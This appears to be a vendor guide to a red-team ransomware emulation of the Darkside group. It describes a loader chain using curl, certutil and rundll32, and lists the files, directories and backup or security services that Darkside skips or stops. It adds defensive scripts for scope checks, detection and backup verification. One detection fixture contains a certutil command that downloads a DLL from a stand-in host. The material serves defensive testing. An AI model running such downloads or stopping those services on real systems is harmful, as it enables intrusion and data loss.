John Lundgren

Attack on Demand: Darkside Group Ransomware Emulation

This guide provides a demonstration and details of the Darkside Group Ransomware Emulation that is a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module.


In May 2021, a cyber threat actor gained access to the network of the Colonial Pipeline Company, and leveraged ransomware-as-a-service (RaaS) capabilities from actors calling themselves the Darkside Group to encrypt the files of the hosts compromised in the network to extort a ransom from the Colonial Pipeline Company. This devastating attack caused a week-long disruption to the operations of the Colonial Pipeline, which transports nearly 45% of the U.S. East Coast fuel supply.

Ransomware attacks like this on organizations of all sizes and industries continue to grow in number and impact. While many cyber threat groups have turned to ransomware operations due to how lucrative it can be, there is not a great deal of variety in the techniques attackers use to encrypt the files on a host. After gaining access to a single host or a larger network through lateral movement techniques, capabilities like the Darkside Group's RaaS will often use a combination of symmetric and asymmetric encryption schemes to encrypt the victim's files, then delete the original versions of each file on the compromised host(s).

More recently, organizations as a whole have been improving their ability to recover from these attacks by regularly backing up their data. In response, many cyber threat groups employing ransomware tactics are also stealing copies of the files being encrypted and threatening to release them publicly, in order to increase the likelihood that a victim organization will pay the ransom.


An attacker has gained initial access to the host you are testing, and now will attempt to encrypt all files the attacker has access to on this host in the same manner as the Darkside Group's RaaS capability, in order to extort your organization for ransom.

Technical Requirements

The host being tested must meet the following technical requirements:

  • Operating System: Microsoft Windows 10

Attack Package Description

The Darkside Ransomware Emulator will start by retrieving a full listing of each file and directory that exists on the host and selecting the first 500 files found whose file types the Darkside Group ransomware targeted (the file types, file names, and directories it skips are listed below under Technical Details). The Emulator then makes a copy of those 500 files and stores them in a directory on the Desktop. Next, the copies of the 500 files will be encrypted using a combination of the AES-256 and Salsa20 encryption algorithms.

If successful, a pop-up window will launch to notify you that the simulation is complete and that the sample of 500 files has been encrypted.
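The file-selection step above follows the exclusion rules reproduced in the Technical Details section of this guide. The following script is an added example, not BreachBits or Darkside code: it applies those three rule tables (ignored extensions, ignored file names, ignored directory search terms) to candidate paths so a defender can tell which files on a host fall inside the emulator's sampling scope, for instance when deciding where a canary file or a "protected folder" setting should sit. The run-together file-name entries on the page are split here into ntldr, ntuser.dat, ntuser.dat.log and ntuser.ini, as in the FireEye report the guide cites; the substring match on directory components and the sample listing are assumptions of this example.

```python
"""Classify Windows paths against the Darkside exclusion rules quoted in
this guide. Added example; not BreachBits or Darkside code."""
from pathlib import PureWindowsPath
from typing import Iterable, List

# Rule tables copied from the guide's Technical Details section.
IGNORED_EXTENSIONS = {
    ".386", ".adv", ".ani", ".bat", ".bin", ".cab", ".cmd", ".com", ".cpl",
    ".cur", ".deskthemepack", ".diagcab", ".diagcfg", ".diagpkg", ".dll",
    ".drv", ".exe", ".hlp", ".icl", ".icns", ".ico", ".ics", ".idx", ".ldf",
    ".lnk", ".mod", ".mpa", ".msc", ".msp", ".msstyles", ".msu", ".nls",
    ".nomedia", ".ocx", ".prf", ".ps1", ".rom", ".rtp", ".scr", ".shs",
    ".spl", ".sys", ".theme", ".themepack", ".wpx", ".lock", ".key", ".hta",
    ".msi", ".pdb",
}
IGNORED_FILENAMES = {
    "$recycle.bin", "config.msi", "$windows.~bt", "$windows.~ws",
    "autorun.inf", "boot.ini", "bootfont.bin", "bootsect.bak", "desktop.ini",
    "iconcache.db", "ntldr", "ntuser.dat", "ntuser.dat.log", "ntuser.ini",
    "thumbs.db",
}
# Matched as case-insensitive substrings of each directory component
# (assumption: this is how "directories containing the search term" works).
IGNORED_DIR_TERMS = [
    "windows", "appdata", "application data", "boot", "google", "mozilla",
    "program files", "program files (x86)", "programdata",
    "system volume information", "tor browser", "windows.old", "intel",
    "msocache", "perflogs", "x64dbg", "public", "all users", "default",
]


def in_scope(path: str) -> bool:
    """True when none of the three exclusion rules removes the file."""
    p = PureWindowsPath(path)
    if p.name.lower() in IGNORED_FILENAMES:
        return False
    if p.suffix.lower() in IGNORED_EXTENSIONS:
        return False
    # Every directory component is checked; one match (e.g. "AppData" in
    # C:\Users\bob\AppData\Roaming) excludes the file.
    for component in p.parts[:-1]:
        lowered = component.lower()
        if any(term in lowered for term in IGNORED_DIR_TERMS):
            return False
    return True


def sample_candidates(paths: Iterable[str], limit: int = 500) -> List[str]:
    """Mimic the 'first N in-scope files found' selection, preserving order."""
    chosen: List[str] = []
    for path in paths:
        if in_scope(path):
            chosen.append(path)
            if len(chosen) >= limit:
                break
    return chosen


if __name__ == "__main__":
    # Constructed sample listing; only two of these paths are in scope.
    listing = [
        r"C:\Users\bob\Desktop\report.docx",
        r"C:\Users\bob\AppData\Roaming\notes.txt",
        r"C:\Program Files\Vendor\readme.txt",
        r"C:\Users\bob\Documents\tool.exe",
        r"C:\Users\bob\Documents\desktop.ini",
        r"C:\Users\Public\Documents\shared.txt",
        r"D:\data\2021\ledger.xlsx",
    ]
    for candidate in sample_candidates(listing):
        print("in scope:", candidate)
```

Because the directory rule is a substring match, a folder such as "Bootstrap" or "Default Templates" is skipped along with the system folders the list was written for; that is worth knowing when you place test files and find they were never sampled.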

Safety and Security Details

  • The files that are encrypted as part of this simulation are only copies of the original files, and can be safely deleted by the simulation upon completion without any data loss or disruption to operations on the host being tested.

  • Two tactics used by the Darkside Group that are not included in the Darkside Group Ransomware Emulator are:

  1. Darkside Group Ransomware Emulator does not delete the original versions of these files. Note: While this tactic can be detected by some security solutions, modern ransomware actors typically exfiltrate a victim's files before deleting them, to be able to threaten public release of the files if the ransom is not paid. Therefore, we consider the ransomware simulation to be successful if files on the host are discovered and the sample of 500 are encrypted.

  2. The Darkside Group Ransomware Emulator does not stop or disrupt any services. The actual Darkside Group ransomware searches for the services listed below under Technical Details, and then stops them to increase the effect of the operation and decrease the usability of the affected host.

Attack Package Steps

Once the execution script is run (as a normal user or Administrator), the following actions will occur:

  1. Internet connectivity will be tested by attempting to ping www.breachbits.com.

  2. The BreachBits BlueShadow loader will be downloaded from the BreachBits attack infrastructure using one of the following native Windows utilities:

     • Curl (only available in recent Windows 10 releases)

     • Powershell

     • Certutil

  3. The Windows utility rundll32.exe will be used to load the BlueShadow Dynamic Link Library (DLL) into memory. Read more about this common execution and defense evasion tactic here: https://attack.mitre.org/techniques/T1218/011/

  4. BlueShadow will download the Darkside Group Ransomware Emulator.

  5. The Emulator will get a full list of all directories and files accessible to the user on the host, make copies of 500 of these files that have the filetypes sought by the Darkside Group payload, and store them in a directory on the user's Desktop.

  6. The Darkside Group Ransomware Emulator will generate the AES-256 and Salsa20 encryption keys, then encrypt the 500 file copies using a combination of the two encryption algorithms. These files will be saved with the .s20 file extension.

  7. A pop-up will launch to indicate that the simulation is complete and where the encrypted files are stored.
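Each step of that chain leaves telemetry a defender can alert on: a native download utility launched with a URL on its command line, rundll32.exe handed a DLL under a user-writable path, and a burst of .s20 file creations by one process. The script below is an added example, not BreachBits code: it runs three such rules over constructed Sysmon-style events (Event ID 1 process creation, Event ID 11 file creation). The event field names, the example.invalid URL, the temp-directory DLL path, and the burst threshold of 20 files within 60 seconds are assumptions made for the example.

```python
"""Detection rules for the emulator's execution chain, run over constructed
Sysmon-style events. Added example; not BreachBits code."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

PROCESS_CREATE = 1   # Sysmon Event ID 1
FILE_CREATE = 11     # Sysmon Event ID 11

DOWNLOADERS = {"curl.exe", "powershell.exe", "certutil.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# A DLL argument that lives somewhere a normal user can write to.
USER_DLL_RE = re.compile(
    r'[a-z]:\\(?:users|programdata|windows\\temp)\\[^\s",]*\.dll',
    re.IGNORECASE,
)
S20_BURST_COUNT = 20    # assumption: alert at 20 .s20 files ...
S20_BURST_WINDOW = 60   # ... created by one process within 60 seconds


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect(events: List[dict]) -> List[Tuple[str, str]]:
    """Return (rule, detail) pairs for every event or burst that matches."""
    alerts: List[Tuple[str, str]] = []
    s20_times: Dict[str, List[int]] = defaultdict(list)

    for ev in events:
        if ev["event_id"] == PROCESS_CREATE:
            exe, cmd = basename(ev["image"]), ev["cmdline"]
            if exe in DOWNLOADERS and URL_RE.search(cmd):
                alerts.append(("lolbin_download", cmd))
            if exe == "rundll32.exe" and USER_DLL_RE.search(cmd):
                alerts.append(("rundll32_user_dll", cmd))
        elif ev["event_id"] == FILE_CREATE:
            if ev["target"].lower().endswith(".s20"):
                s20_times[ev["image"]].append(ev["ts"])

    # Sliding window over each process's .s20 creation timestamps; one
    # alert per process once the threshold is crossed.
    for image, times in s20_times.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > S20_BURST_WINDOW:
                start += 1
            if end - start + 1 >= S20_BURST_COUNT:
                alerts.append(("s20_burst", f"{image}: {end - start + 1} files"))
                break
    return alerts


def sample_events() -> List[dict]:
    """Constructed telemetry resembling the steps above (not real logs)."""
    t0 = 1_700_000_000
    events = [
        {"ts": t0, "event_id": PROCESS_CREATE,
         "image": r"C:\Windows\System32\certutil.exe",
         "cmdline": "certutil.exe -urlcache -f https://example.invalid/loader.dll loader.dll"},
        {"ts": t0 + 2, "event_id": PROCESS_CREATE,
         "image": r"C:\Windows\System32\rundll32.exe",
         "cmdline": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\loader.dll,Start"},
        {"ts": t0 + 3, "event_id": PROCESS_CREATE,   # benign system DLL, no alert
         "image": r"C:\Windows\System32\rundll32.exe",
         "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    ]
    for i in range(25):   # 25 encrypted copies written one second apart
        events.append({"ts": t0 + 10 + i, "event_id": FILE_CREATE,
                       "image": r"C:\Users\bob\AppData\Local\Temp\emulator.exe",
                       "target": rf"C:\Users\bob\Desktop\sample\file{i}.docx.s20"})
    return events


if __name__ == "__main__":
    for rule, detail in detect(sample_events()):
        print(f"{rule}: {detail}")
```

The burst rule keys on the .s20 extension this emulator writes; against real ransomware the extension varies, so the same window logic is more useful keyed on rename or write rates per process than on one suffix.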

Results and Next Steps

Detection and disruption of ransomware threats on hosts can be challenging, even for some of today's most advanced endpoint detection solutions. Regardless of whether your security solution(s) detected and stopped the Darkside Group Ransomware Emulator, we recommend:

  • Check whether your security solution(s) have any ransomware-specific features that are not yet enabled, such as marking particular directories, files, etc. as protected. Enabling them may improve your security solution(s)' ability to detect and stop ransomware attacks.

  • Test hosts in your environment with other tactics that can be used in larger-scope ransomware attacks, such as privilege escalation and lateral movement techniques.

  • Ensure your organization has and executes a data-backup policy, so that sensitive files are secured in a controlled environment. Practice implementing backups periodically, to ensure the duplicated files are stored correctly and that your organization's staff is trained and prepared to restore them.
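A backup only counts if a restore reproduces the original files. The script below is an added example, not BreachBits code: it records a SHA-256 manifest of a source tree at backup time and later checks a restored copy against it, reporting files that are intact, missing, modified, or unexpected. The demo builds a throwaway tree in a temporary directory and damages the restored copy the way an encryption run would (one file overwritten in place, one replaced by a .s20 copy with the original removed); the file names and contents are constructed for the example.

```python
"""Verify a restored backup against a hash manifest. Added example; not
BreachBits code."""
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map each file's path relative to root (forward slashes) to its SHA-256."""
    manifest: Dict[str, str] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_restore(manifest: Dict[str, str], restored_root: str) -> Dict[str, List[str]]:
    """Classify every manifest entry as ok, missing or modified; list extras."""
    report: Dict[str, List[str]] = {"ok": [], "missing": [], "modified": [], "unexpected": []}
    for rel, digest in sorted(manifest.items()):
        full = os.path.join(restored_root, *rel.split("/"))
        if not os.path.isfile(full):
            report["missing"].append(rel)
        elif sha256_file(full) != digest:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    for rel in sorted(build_manifest(restored_root)):
        if rel not in manifest:
            report["unexpected"].append(rel)
    return report


def demo() -> Dict[str, List[str]]:
    """Back up a constructed tree, damage the restore, and return the report."""
    with tempfile.TemporaryDirectory() as work:
        src = os.path.join(work, "source")
        os.makedirs(os.path.join(src, "docs"))
        with open(os.path.join(src, "docs", "report.docx"), "wb") as fh:
            fh.write(b"quarterly figures")
        with open(os.path.join(src, "ledger.xlsx"), "wb") as fh:
            fh.write(b"accounts")
        with open(os.path.join(src, "notes.txt"), "wb") as fh:
            fh.write(b"meeting notes")

        manifest = build_manifest(src)          # taken at backup time
        restored = os.path.join(work, "restored")
        shutil.copytree(src, restored)           # the "restore"

        # Simulated damage: one file overwritten in place, one replaced by an
        # encrypted copy with the original deleted, one left untouched.
        with open(os.path.join(restored, "ledger.xlsx"), "wb") as fh:
            fh.write(b"\x00ciphertext\x00")
        os.rename(os.path.join(restored, "docs", "report.docx"),
                  os.path.join(restored, "docs", "report.docx.s20"))
        return verify_restore(manifest, restored)


if __name__ == "__main__":
    for status, files in demo().items():
        print(f"{status}: {files}")
```

Keep the manifest with the backup but outside the host being protected; a manifest that sits beside the files it describes is encrypted or deleted along with them.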

Technical Details (Source: https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html)

Filetypes ignored by Darkside Group Ransomware (and Darkside Group Ransomware Emulator):

  • .386, .adv, .ani, .bat, .bin, .cab, .cmd, .com, .cpl, .cur, .deskthemepack, .diagcab, .diagcfg, .diagpkg, .dll, .drv, .exe, .hlp, .icl, .icns, .ico, .ics, .idx, .ldf, .lnk, .mod, .mpa, .msc, .msp, .msstyles, .msu, .nls, .nomedia, .ocx, .prf, .ps1, .rom, .rtp, .scr, .shs, .spl, .sys, .theme, .themepack, .wpx, .lock, .key, .hta, .msi, .pdb

Files ignored by Darkside Group Ransomware (and Darkside Group Ransomware Emulator):

  • $recycle.bin

  • config.msi

  • $windows.~bt

  • $windows.~ws

  • autorun.inf

  • boot.ini

  • bootfont.bin

  • bootsect.bak

  • desktop.ini

  • iconcache.db

  • ntldr

  • ntuser.dat

  • ntuser.dat.log

  • ntuser.ini

  • thumbs.db

Directories containing the following search terms ignored by Darkside Group Ransomware (and Darkside Group Ransomware Emulator):

  • windows

  • appdata

  • application data

  • boot

  • google

  • mozilla

  • program files

  • program files (x86)

  • programdata

  • system volume information

  • tor browser

  • windows.old

  • intel

  • msocache

  • perflogs

  • x64dbg

  • public

  • all users

  • default

Services stopped by the Darkside Group Ransomware (but NOT the Darkside Group Ransomware Emulator):

  • vss

  • sql

  • svc$

  • memtas

  • mepocs

  • sophos

  • veeam

  • backup

  • Services containing strings:

  • GxVss

  • GxBlr

  • GxFWD

  • GxCVD

  • GxCIMgr

  • sql

  • oracle

  • ocssd

  • dbsnmp

  • synctime

  • agntsvc

  • isqlplussvc

  • xfssvccon

  • mydesktopservice

  • ocautoupds

  • encsvc

  • firefox

  • tbirdconfig

  • mydesktopqos

  • ocomm

  • dbeng50

  • sqbcoreservice

  • excel

  • infopath

  • msaccess

  • mspub

  • onenote

  • outlook

  • powerpnt

  • steam

  • thebat

  • thunderbird

  • visio

  • winword

  • wordpad

  • notepad
